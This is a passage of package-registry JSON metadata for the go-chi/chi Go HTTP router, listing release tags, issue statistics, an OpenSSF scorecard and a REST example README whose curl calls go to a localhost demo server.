itHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.108Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":0.42444926529425825,"forks_count":0.6257877057855061,"average":4.348809308704352},"purl":"pkg:golang/gopkg.in/go-chi/chi.v4","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/gopkg.in/go-chi/chi.v4","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/gopkg.in/go-chi/chi.v4","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/gopkg.in/go-chi/chi.v4/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v4/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v4/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v4/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v4/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v4/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v4/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":4052003,"name":"github.com/go-chi/chi/_examples/rest","ecosystem":"go","description":"REST\n====\nThis example demonstrates a HTTP REST web service with some fixture data.\nFollow along the example and patterns.\n\nBoot the server:\n----------------\n$ go run main.go\n\nClient requests:\n----------------\n$ curl http://localhost:3333/\nroot.\n\n$ curl http://localhost:3333/articles\n[{\"id\":\"1\",\"title\":\"Hi\"},{\"id\":\"2\",\"title\":\"sup\"}]\n\n$ curl http://localhost:3333/articles/1\n{\"id\":\"1\",\"title\":\"Hi\"}\n\n$ curl -X DELETE http://localhost:3333/articles/1\n{\"id\":\"1\",\"title\":\"Hi\"}\n\n$ curl http://localhost:3333/articles/1\n\"Not Found\"\n\n$ curl -X POST -d '{\"id\":\"will-be-omitted\",\"title\":\"awesomeness\"}' http://localhost:3333/articles\n{\"id\":\"97\",\"title\":\"awesomeness\"}\n\n$ curl http://localhost:3333/articles/97\n{\"id\":\"97\",\"title\":\"awesomeness\"}\n\n$ curl http://localhost:3333/articles\n[{\"id\":\"2\",\"title\":\"sup\"},{\"id\":\"97\",\"title\":\"awesomeness\"}]","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"github.com/go-chi/chi/_examples","versions_count":32,"first_release_published_at":"2022-11-19T10:42:21.395Z","latest_release_published_at":"2022-11-19T10:42:21.395Z","latest_release_number":"v4.1.2+incompatible","last_synced_at":"2026-08-12T02:06:17.449Z","created_at":"2022-04-12T10:17:00.992Z","updated_at":"2026-08-12T02:06:17.449Z","registry_url":"https://pkg.go.dev/github.com/go-chi/chi/_examples/rest","install_command":"go get github.com/go-chi/chi/_examples/rest","documentation_url":"https://pkg.go.dev/github.com/go-chi/chi/_examples/rest#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_u